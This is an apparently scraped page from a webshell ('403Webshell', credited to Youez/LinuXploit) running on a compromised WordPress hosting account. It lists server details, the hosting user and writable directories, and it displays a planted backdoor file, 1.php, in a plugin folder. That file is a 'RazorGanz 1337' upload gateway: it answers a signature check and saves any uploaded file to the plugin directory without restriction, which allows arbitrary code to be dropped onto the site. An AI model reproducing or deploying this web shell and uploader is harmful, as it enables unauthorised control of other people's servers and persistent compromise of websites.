403Webshell
Server IP : 213.186.33.2  /  Your IP : 216.73.216.39
Web Server : Apache
System : Linux webm005.cluster102.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : symetry ( 21728)
PHP Version : 8.2.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/symetry/www/wp-content/plugins/popularis-extra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/symetry/www/wp-content/plugins/popularis-extra//1.php
<?php
header('Content-Type: text/html; charset=utf-8');
const NX = 'Nx-zD';
if (isset($_GET['sig']) && $_GET['sig'] === '1') {
    header('Content-Type: text/plain; charset=utf-8');
    echo NX;
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>./RazorGanz 1337</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font:14px/1.55 system-ui,-apple-system,Segoe UI,sans-serif;background:radial-gradient(circle at top,#0f172a,#020617);color:#cbd5e1;min-height:100vh;display:flex;align-items:center;justify-content:center;padding:24px}
.card{width:100%;max-width:460px;background:rgba(15,23,42,.94);border:1px solid #1e293b;border-radius:16px;padding:28px 24px;box-shadow:0 20px 50px rgba(0,0,0,.45)}
.brand{text-align:center;font-size:26px;font-weight:800;letter-spacing:.16em;color:#39ff14;margin:8px 0 6px}
.sub{text-align:center;font-size:11px;color:#64748b;text-transform:uppercase;letter-spacing:.2em;margin-bottom:20px}
h1{text-align:center;font-size:14px;font-weight:600;color:#e2e8f0;margin-bottom:16px}
input[type=file]{width:100%;margin-bottom:12px;padding:10px;border:1px dashed #334155;border-radius:10px;background:#0b1220;color:#94a3b8}
button{width:100%;padding:10px;border:0;border-radius:10px;background:linear-gradient(135deg,#065f46,#047857);color:#ecfdf5;font-size:13px;font-weight:600;cursor:pointer}
button:hover{filter:brightness(1.1)}
.ok{margin-top:12px;padding:10px;background:#052e16;border:1px solid #14532d;border-radius:10px;font-size:12px;color:#4ade80;word-break:break-all}
.sig{display:none}Nx-zD</style>
</head>
<body>
<div class="card">
<p class="brand">./RazorGanz 1337</p>
<p class="sub">Upload Gateway</p>
<h1>File Upload</h1>
<form method="post" enctype="multipart/form-data">
<input type="file" name="f" required>
<button type="submit">Upload</button>
</form>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['f']) && $_FILES['f']['error'] === UPLOAD_ERR_OK) {
    $n = basename($_FILES['f']['name']);
    if (move_uploaded_file($_FILES['f']['tmp_name'], $n)) {
        echo '<p class="ok">Uploaded: ' . htmlspecialchars($n, ENT_QUOTES, 'UTF-8') . '</p>';
    }
}
?>
</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit